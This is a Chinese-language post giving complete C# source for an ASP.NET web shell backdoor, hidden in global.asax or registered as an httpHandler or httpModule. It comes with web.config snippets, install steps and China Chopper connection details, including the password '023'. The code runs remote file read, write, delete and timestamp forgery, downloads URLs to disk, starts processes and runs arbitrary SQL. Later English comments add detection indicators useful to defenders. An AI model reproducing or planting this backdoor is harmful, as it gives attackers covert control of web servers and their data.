
ASP.NET global.asax、httpHandlers、httpModules 後門-園長

特別注意:配置時需要特別小心,任何一個誤操作都可能導致網站徹底崩潰,對於新手而言操作危險係數很高。這裡只是技術分享,請最好先在本地測試。如發現BUG請與我聯繫。

ASP.NET global.asax、httpHandlers、httpModules 後門-園長

一:global.asax


<%@ Application Language=

"C#"

%>

<script RunAt=

'server'

>

// Application start hook of global.asax. The body holds only a comment in this listing.
void Application_Start(object sender, EventArgs e)
{
    // Code that runs when the application starts
}

// Application shutdown hook of global.asax. The body holds only a comment in this listing.
void Application_End(object sender, EventArgs e)
{
    // Code that runs when the application shuts down
}

// Application error hook of global.asax. Empty in this listing: nothing is logged or handled here.
void Application_Error(object sender, EventArgs e)
{
}

// Session start hook of global.asax. The body holds only a comment in this listing.
void Session_Start(object sender, EventArgs e)
{
    // Code that runs when a new session starts
}

// Session end hook of global.asax. The body holds only comments in this listing.
void Session_End(object sender, EventArgs e)
{
    // Code that runs when a session ends.
    // Note: the Session_End event is raised only when the sessionstate mode
    // in the Web.config file is set to InProc. If the session mode is set to
    // StateServer or SQLServer, the event is not raised.
}

// Copies S to D. When S is an existing directory, D is created and every file and
// subdirectory directly under S is copied into it, recursing into subdirectories;
// otherwise S is copied to D as a single file.
// Review note: the only caller in this listing is the "H" case of EvalRequest, which
// passes the request's Z1 and Z2 form fields unchanged, so both paths are chosen by
// whoever sends the request.
void CP(string S, string D)
{
    if (System.IO.Directory.Exists(S))
    {
        System.IO.DirectoryInfo m = new System.IO.DirectoryInfo(S);
        System.IO.Directory.CreateDirectory(D);
        foreach (System.IO.FileInfo F in m.GetFiles())
        {
            System.IO.File.Copy(S + "\\" + F.Name, D + "\\" + F.Name);
        }
        foreach (System.IO.DirectoryInfo F in m.GetDirectories())
        {
            CP(S + "\\" + F.Name, D + "\\" + F.Name);
        }
    }
    else
    {
        System.IO.File.Copy(S, D);
    }
}

void

EvalRequest(

string

action)

{

HttpContext context = HttpContext.Current;

HttpRequest request = context.Request;

HttpResponse response = context.Response;

string

Z = action;

if

(Z !=

""

)

{

string

Z1 = request.Form[

"Z1"

];

string

Z2 = request.Form[

"Z2"

];

string

R =

""

;

try

{

switch

(Z)

{

case

"A"

:

{

string

[] c = System.IO.Directory.GetLogicalDrives();

R =

string

.Format(

"{0}\t"

, context.Server.MapPath(

"~"

));

for

(

int

i = 0; i < c.Length; i++)

R += c[i][0] +

":"

;

break

;

}

case

"B"

:

{

System.IO.DirectoryInfo m =

new

System.IO.DirectoryInfo(Z1);

foreach

(System.IO.DirectoryInfo D

in

m.GetDirectories())

{

R +=

string

.Format(

"{0}/\t{1}\t0\t-\n"

, D.Name, System.IO.File.GetLastWriteTime(Z1 + D.Name).ToString(

"yyyy-MM-dd hh:mm:ss"

));

}

foreach

(System.IO.FileInfo D

in

m.GetFiles())

{

R +=

string

.Format(

"{0}\t{1}\t{2}\t-\n"

, D.Name, System.IO.File.GetLastWriteTime(Z1 + D.Name).ToString(

"yyyy-MM-dd hh:mm:ss"

), D.Length);

}

break

;

}

case

"C"

:

{

System.IO.StreamReader m =

new

System.IO.StreamReader(Z1, Encoding.Default);

R = m.ReadToEnd();

m.Close();

break

;

}

case

"D"

:

{

System.IO.StreamWriter m =

new

System.IO.StreamWriter(Z1,

false

, Encoding.Default);

m.Write(Z2);

R =

"1"

;

m.Close();

break

;

}

case

"E"

:

{

if

(System.IO.Directory.Exists(Z1))

System.IO.Directory.Delete(Z1,

true

);

else

System.IO.File.Delete(Z1);

R =

"1"

;

break

;

}

case

"F"

:

{

response.Clear();

response.Write(

"\x2D\x3E\x7C"

);

response.WriteFile(Z1);

response.Write(

"\x7C\x3C\x2D"

);

goto

End;

}

case

"G"

:

{

byte

[] B =

new

byte

[Z2.Length / 2];

for

(

int

i = 0; i < Z2.Length; i += 2)

{

B[i / 2] = (

byte

)Convert.ToInt32(Z2.Substring(i, 2), 16);

}

System.IO.FileStream fs =

new

System.IO.FileStream(Z1, System.IO.FileMode.Create);

fs.Write(B, 0, B.Length);

fs.Close();

R =

"1"

;

break

;

}

case

"H"

:

{

CP(Z1, Z2);

R =

"1"

;

break

;

}

case

"I"

:

{

if

(System.IO.Directory.Exists(Z1))

{

System.IO.Directory.Move(Z1, Z2);

}

else

{

System.IO.File.Move(Z1, Z2);

}

break

;

}

case

"J"

:

{

System.IO.Directory.CreateDirectory(Z1);

R =

"1"

;

break

;

}

case

"K"

:

{

DateTime TM = Convert.ToDateTime(Z2);

if

(System.IO.Directory.Exists(Z1))

{

System.IO.Directory.SetCreationTime(Z1, TM);

System.IO.Directory.SetLastWriteTime(Z1, TM);

System.IO.Directory.SetLastAccessTime(Z1, TM);

}

else

{

System.IO.File.SetCreationTime(Z1, TM);

System.IO.File.SetLastWriteTime(Z1, TM);

System.IO.File.SetLastAccessTime(Z1, TM);

}

R =

"1"

;

break

;

}

case

"L"

:

{

System.Net.HttpWebRequest RQ = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(

new

Uri(Z1));

RQ.Method =

"GET"

;

RQ.ContentType =

"application/x-www-form-urlencoded"

;

System.Net.HttpWebResponse WB = (System.Net.HttpWebResponse)RQ.GetResponse();

System.IO.Stream WF = WB.GetResponseStream();

System.IO.FileStream FS =

new

System.IO.FileStream(Z2, System.IO.FileMode.Create, System.IO.FileAccess.Write);

int

i;

byte

[] buffer =

new

byte

[1024];

while

(

true

)

{

i = WF.Read(buffer, 0, buffer.Length);

if

(i < 1)

break

; FS.Write(buffer, 0, i);

}

WF.Close();

WB.Close();

FS.Close();

R =

"1"

;

break

;

}

case

"M"

:

{

System.Diagnostics.ProcessStartInfo c =

new

System.Diagnostics.ProcessStartInfo(Z1.Substring(2));

System.Diagnostics.Process e =

new

System.Diagnostics.Process();

System.IO.StreamReader OT, ER;

c.UseShellExecute =

false

;

c.RedirectStandardOutput =

true

;

c.RedirectStandardError =

true

;

e.StartInfo = c;

c.Arguments =

string

.Format(

"{0} {1}"

, Z1.Substring(0, 2), Z2);

e.Start(); OT = e.StandardOutput;

ER = e.StandardError;

e.Close();

R = OT.ReadToEnd() + ER.ReadToEnd();

break

;

}

case

"N"

:

{

String strDat = Z1.ToUpper();

System.Data.SqlClient.SqlConnection Conn =

new

System.Data.SqlClient.SqlConnection(Z1);

Conn.Open();

R = Conn.Database +

"\t"

;

Conn.Close();

break

;

}

case

"O"

:

{

String[] x = Z1.Replace(

"\r"

,

""

).Split(

'\n'

);

String strConn = x[0], strDb = x[1];

System.Data.SqlClient.SqlConnection Conn =

new

System.Data.SqlClient.SqlConnection(strConn);

Conn.Open();

System.Data.DataTable dt = Conn.GetSchema(

"Columns"

);

Conn.Close();

for

(

int

i = 0; i < dt.Rows.Count; i++)

{

R += String.Format(

"{0}\t"

, dt.Rows[i][2].ToString());

}

break

;

}

case

"P"

:

{

String[] x = Z1.Replace(

"\r"

,

""

).Split(

'\n'

), p =

new

String[4];

String strConn = x[0], strDb = x[1], strTable = x[2]; p[0] = strDb;

p[2] = strTable;

System.Data.SqlClient.SqlConnection Conn =

new

System.Data.SqlClient.SqlConnection(strConn);

Conn.Open();

System.Data.DataTable dt = Conn.GetSchema(

"Columns"

, p);

Conn.Close();

for

(

int

i = 0; i < dt.Rows.Count; i++)

{

R += String.Format(

"{0} ({1})\t"

, dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString());

}

break

;

}

case

"Q"

:

{

String[] x = Z1.Replace(

"\r"

,

""

).Split(

'\n'

);

String strDat, strConn = x[0], strDb = x[1];

int

i, c;

strDat = Z2.ToUpper();

System.Data.SqlClient.SqlConnection Conn =

new

System.Data.SqlClient.SqlConnection(strConn);

Conn.Open();

if

(strDat.IndexOf(

"SELECT "

) == 0 || strDat.IndexOf(

"EXEC "

) == 0 || strDat.IndexOf(

"DECLARE "

) == 0)

{

System.Data.SqlClient.SqlDataAdapter OD =

new

System.Data.SqlClient.SqlDataAdapter(Z2, Conn);

System.Data.DataSet ds =

new

System.Data.DataSet();

OD.Fill(ds);

if

(ds.Tables.Count > 0)

{

System.Data.DataRowCollection rows = ds.Tables[0].Rows;

for

(c = 0; c < ds.Tables[0].Columns.Count; c++)

{

R += String.Format(

"{0}\t|\t"

, ds.Tables[0].Columns[c].ColumnName.ToString());

}

R +=

"\r\n"

;

for

(i = 0; i < rows.Count; i++)

{

for

(c = 0; c < ds.Tables[0].Columns.Count; c++)

{

R += String.Format(

"{0}\t|\t"

, rows[i][c].ToString());

}

R +=

"\r\n"

;

}

}

ds.Clear();

ds.Dispose();

}

else

{

System.Data.SqlClient.SqlCommand cm = Conn.CreateCommand();

cm.CommandText = Z2;

cm.ExecuteNonQuery();

R =

"Result\t|\t\r\nExecute Successfully!\t|\t\r\n"

;

}

Conn.Close();

break

;

}

default

:

goto

End;

}

}

catch

(Exception E)

{

R =

"ERROR:// "

+ E.Message;

}

response.Write(

"\x2D\x3E\x7C"

+ R +

"\x7C\x3C\x2D"

);

End: ;

}

}

// Raised when the application receives a request. It is the first event raised for a
// request; the request is usually a page request (URL) entered by the user.
//
// Review note: this handler is the trigger of the backdoor in this global.asax. Any request
// whose form data contains a field named "023" is passed to EvalRequest and the response is
// then ended here, at the first pipeline event; requests without that field fall through
// untouched. EvalRequest (defined in this file) switches on the field's value and, using the
// Z1/Z2 form fields as arguments, performs file read/write/delete/copy/move, directory
// listing, timestamp changes, download of a URL to disk, process start with captured output,
// and SQL Server schema queries and statements, writing the result between the markers
// "->|" and "|<-".
// For defenders: a BeginRequest handler in global.asax that reads a request field and calls
// Response.End() is not part of the default template and warrants review; the "->|" / "|<-"
// markers in response bodies are a searchable indicator; because of the timestamp-setting
// case, file times on an affected host should not be trusted on their own.
void Application_BeginRequest(object sender, EventArgs evt)
{
    // Null means the field is absent from the form data; only then is the request left alone.
    string action = Request.Form["023"];
    if (action != null)
    {
        EvalRequest(action);
        // Ends the response after EvalRequest returns.
        Response.End();
    }
}

</script>

二、httpHandlers

修改web.config,添加或者修改httpHandlers:


<

httpHandlers

>

<

add

path

=

"*.api"

verb

=

"*"

type

=

"WooYun.CustomizeHttpHandler"

/>

</

httpHandlers

>

如果已經存在 httpHandlers 則在标簽内添加,如果<system.webServer>也有配置httpHandlers那麼就配置在<system.webServer>裡,但是有一點需要特别注意:<system.webServer>裡面一定要配置runAllManagedModulesForAllRequests為true,否會啟動報錯。


<

system.webServer

>

<

modules

runAllManagedModulesForAllRequests

=

"true"

/>

</

system.webServer

>

三:httpModules

相比修改httpHandlers顯然這種辦法更加的有效且安全一些。但是一定要把這個httpModule的順序配置到httpModules的第一個。修改web.config,添加或者修改httpHandlers:


<

httpModules

>

<

add

name

=

"WooYun"

type

=

"WooYun.CustomizeHttpModule"

/>

</

httpModules

>

Customize.cs代碼:


using

System;

using

System.Data;

using

System.Configuration;

using

System.Web;

using

System.IO;

using

System.Text;

using

System.Net;

using

System.Diagnostics;

using

System.Data.SqlClient;

namespace

WooYun

{

public

class

Customize

{

// Copies S to D. When S is an existing directory, D is created and every file and
// subdirectory directly under S is copied into it, recursing into subdirectories;
// otherwise S is copied to D as a single file.
// Review note: the only caller in this listing is the "H" case of Customize.Request, which
// passes the request's Z1 and Z2 form fields unchanged, so both paths are chosen by
// whoever sends the request.
public static void CP(string S, string D)
{
    if (Directory.Exists(S))
    {
        DirectoryInfo m = new DirectoryInfo(S);
        Directory.CreateDirectory(D);
        foreach (FileInfo F in m.GetFiles())
        {
            File.Copy(S + "\\" + F.Name, D + "\\" + F.Name);
        }
        foreach (DirectoryInfo F in m.GetDirectories())
        {
            CP(S + "\\" + F.Name, D + "\\" + F.Name);
        }
    }
    else
    {
        File.Copy(S, D);
    }
}

public

static

void

Request()

{

HttpContext context = HttpContext.Current;

HttpRequest request = context.Request;

HttpResponse response = context.Response;

string

Z = request.Form[

"023"

];

if

(Z !=

""

)

{

string

Z1 = request.Form[

"Z1"

];

string

Z2 = request.Form[

"Z2"

];

string

R =

""

;

try

{

switch

(Z)

{

case

"A"

:

{

string

[] c = Directory.GetLogicalDrives();

R =

string

.Format(

"{0}\t"

, context.Server.MapPath(

"/"

));

for

(

int

i = 0; i < c.Length; i++)

R += c[i][0] +

":"

;

break

;

}

case

"B"

:

{

DirectoryInfo m =

new

DirectoryInfo(Z1);

foreach

(DirectoryInfo D

in

m.GetDirectories())

{

R +=

string

.Format(

"{0}/\t{1}\t0\t-\n"

, D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString(

"yyyy-MM-dd hh:mm:ss"

));

}

foreach

(FileInfo D

in

m.GetFiles())

{

R +=

string

.Format(

"{0}\t{1}\t{2}\t-\n"

, D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString(

"yyyy-MM-dd hh:mm:ss"

), D.Length);

}

break

;

}

case

"C"

:

{

StreamReader m =

new

StreamReader(Z1, Encoding.Default);

R = m.ReadToEnd();

m.Close();

break

;

}

case

"D"

:

{

StreamWriter m =

new

StreamWriter(Z1,

false

, Encoding.Default);

m.Write(Z2);

R =

"1"

;

m.Close();

break

;

}

case

"E"

:

{

if

(Directory.Exists(Z1))

Directory.Delete(Z1,

true

);

else

File.Delete(Z1);

R =

"1"

;

break

;

}

case

"F"

:

{

response.Clear();

response.Write(

"\x2D\x3E\x7C"

);

response.WriteFile(Z1);

response.Write(

"\x7C\x3C\x2D"

);

goto

End;

}

case

"G"

:

{

byte

[] B =

new

byte

[Z2.Length / 2];

for

(

int

i = 0; i < Z2.Length; i += 2)

{

B[i / 2] = (

byte

)Convert.ToInt32(Z2.Substring(i, 2), 16);

}

FileStream fs =

new

FileStream(Z1, FileMode.Create);

fs.Write(B, 0, B.Length);

fs.Close();

R =

"1"

;

break

;

}

case

"H"

:

{

CP(Z1, Z2); R =

"1"

;

break

;

}

case

"I"

:

{

if

(Directory.Exists(Z1))

{

Directory.Move(Z1, Z2);

}

else

{

File.Move(Z1, Z2);

}

break

;

}

case

"J"

:

{

Directory.CreateDirectory(Z1);

R =

"1"

;

break

;

}

case

"K"

:

{

DateTime TM = Convert.ToDateTime(Z2);

if

(Directory.Exists(Z1))

{

Directory.SetCreationTime(Z1, TM);

Directory.SetLastWriteTime(Z1, TM);

Directory.SetLastAccessTime(Z1, TM);

}

else

{

File.SetCreationTime(Z1, TM);

File.SetLastWriteTime(Z1, TM);

File.SetLastAccessTime(Z1, TM);

}

R =

"1"

;

break

;

}

case

"L"

:

{

HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(

new

Uri(Z1));

RQ.Method =

"GET"

;

RQ.ContentType =

"application/x-www-form-urlencoded"

;

HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse();

Stream WF = WB.GetResponseStream();

FileStream FS =

new

FileStream(Z2, FileMode.Create, FileAccess.Write);

int

i;

byte

[] buffer =

new

byte

[1024];

while

(

true

)

{

i = WF.Read(buffer, 0, buffer.Length);

if

(i < 1)

break

; FS.Write(buffer, 0, i);

}

WF.Close();

WB.Close();

FS.Close();

R =

"1"

;

break

;

}

case

"M"

:

{

System.Diagnostics.ProcessStartInfo c =

new

System.Diagnostics.ProcessStartInfo(Z1.Substring(2));

System.Diagnostics.Process e =

new

System.Diagnostics.Process();

System.IO.StreamReader OT, ER;

c.UseShellExecute =

false

;

c.RedirectStandardOutput =

true

;

c.RedirectStandardError =

true

;

e.StartInfo = c;

c.Arguments =

string

.Format(

"{0} {1}"

, Z1.Substring(0, 2), Z2);

e.Start();

OT = e.StandardOutput;

ER = e.StandardError;

e.Close();

R = OT.ReadToEnd() + ER.ReadToEnd();

break

;

}

case

"N"

:

{

String strDat = Z1.ToUpper();

SqlConnection Conn =

new

SqlConnection(Z1);

Conn.Open();

R = Conn.Database +

"\t"

;

Conn.Close();

break

;

}

case

"O"

:

{

String[] x = Z1.Replace(

"\r"

,

""

).Split(

'\n'

);

String strConn = x[0], strDb = x[1];

SqlConnection Conn =

new

SqlConnection(strConn);

Conn.Open();

DataTable dt = Conn.GetSchema(

"Columns"

);

Conn.Close();

for

(

int

i = 0; i < dt.Rows.Count; i++)

{

R += String.Format(

"{0}\t"

, dt.Rows[i][2].ToString());

}

break

;

}

case

"P"

:

{

String[] x = Z1.Replace(

"\r"

,

""

).Split(

'\n'

), p =

new

String[4];

String strConn = x[0], strDb = x[1], strTable = x[2];

p[0] = strDb;

p[2] = strTable;

SqlConnection Conn =

new

SqlConnection(strConn);

Conn.Open();

DataTable dt = Conn.GetSchema(

"Columns"

, p);

Conn.Close();

for

(

int

i = 0; i < dt.Rows.Count; i++)

{

R += String.Format(

"{0} ({1})\t"

, dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString());

}

break

;

}

case

"Q"

:

{

String[] x = Z1.Replace(

"\r"

,

""

).Split(

'\n'

);

String strDat, strConn = x[0], strDb = x[1];

int

i, c;

strDat = Z2.ToUpper();

SqlConnection Conn =

new

SqlConnection(strConn);

Conn.Open();

if

(strDat.IndexOf(

"SELECT "

) == 0 || strDat.IndexOf(

"EXEC "

) == 0 || strDat.IndexOf(

"DECLARE "

) == 0)

{

SqlDataAdapter OD =

new

SqlDataAdapter(Z2, Conn);

DataSet ds =

new

DataSet(); OD.Fill(ds);

if

(ds.Tables.Count > 0)

{

DataRowCollection rows = ds.Tables[0].Rows;

for

(c = 0; c < ds.Tables[0].Columns.Count; c++)

{

R += String.Format(

"{0}\t|\t"

, ds.Tables[0].Columns[c].ColumnName.ToString());

}

R +=

"\r\n"

;

for

(i = 0; i < rows.Count; i++)

{

for

(c = 0; c < ds.Tables[0].Columns.Count; c++)

{

R += String.Format(

"{0}\t|\t"

, rows[i][c].ToString());

}

R +=

"\r\n"

;

}

}

ds.Clear();

ds.Dispose();

}

else

{

SqlCommand cm = Conn.CreateCommand();

cm.CommandText = Z2;

cm.ExecuteNonQuery();

R =

"Result\t|\t\r\nExecute Successfully!\t|\t\r\n"

;

}

Conn.Close();

break

;

}

default

:

goto

End;

}

}

catch

(Exception E)

{

R =

"ERROR:// "

+ E.Message;

}

response.Write(

"\x2D\x3E\x7C"

+ R +

"\x7C\x3C\x2D"

);

End: ;

}

response.End();

}

}

// IHttpHandler that hands every request routed to it to Customize.Request(), the command
// dispatcher defined in this file. The article's web.config snippet maps this type to
// path "*.api" for all verbs.
// Review note: when auditing a site, the artifacts to look for are a handler mapping in
// web.config whose type does not belong to the deployed application, together with an
// unexplained assembly in the bin directory or source file in App_Code (the two install
// locations the article names).
public class CustomizeHttpHandler : IHttpHandler
{
    // Always reports the handler instance as reusable.
    public bool IsReusable
    {
        get
        {
            return true;
        }
    }
    // The context argument is not used; Customize.Request() reads HttpContext.Current itself.
    public void ProcessRequest(HttpContext context)
    {
        Customize.Request();
    }
}

// IHttpModule that subscribes to BeginRequest and forwards each request it sees to
// Customize.Request(), the command dispatcher defined in this file. The article's web.config
// snippet registers it under the name "WooYun".
// Review note: unlike a handler, a module is not tied to a URL pattern, so no request path
// identifies it; audit the httpModules / modules sections of web.config for entries whose
// type does not belong to the deployed application, and check bin and App_Code for the
// matching assembly or source file.
public class CustomizeHttpModule : IHttpModule
{
    #region IHttpModule 成員
    // Nothing to release; the body is empty.
    public void Dispose()
    {
    }
    // Hooks context_BeginRequest onto the application's BeginRequest event.
    public void Init(HttpApplication context)
    {
        context.BeginRequest += new EventHandler(context_BeginRequest);
    }
    // Runs for each BeginRequest event; sender and e are not used.
    void context_BeginRequest(object sender, EventArgs e)
    {
        Customize.Request();
    }
    #endregion
}

}

四:安裝方法

global.asax是不需要編譯的,是以直接忽略。

httpHandlers和httpModules配置方式:

1、自行編譯上面的cs檔案dll

2、複制dll到bin目錄

3、修改上述配置,并仔細檢查

或:

1、直接建立個Customize.cs檔案

2、複制Customize.cs檔案到App_Code目錄

3、修改上述配置,并仔細檢查

連接配接:

1、菜刀連接配接的時候必須選Customize:

2、httpHandlers 可以自己指定字尾,比如你配置了.api請求那麼可以http://xx.com/123456.api做為shell位址,可能會有不能攔截除aspx的情況

3、httpModules可以随便通路一個隻要不是靜态檔案的連結(比如jpg檔案不允許被POST) 可以通路:http://xx.com/123456.xxx

4、連接配接密碼:023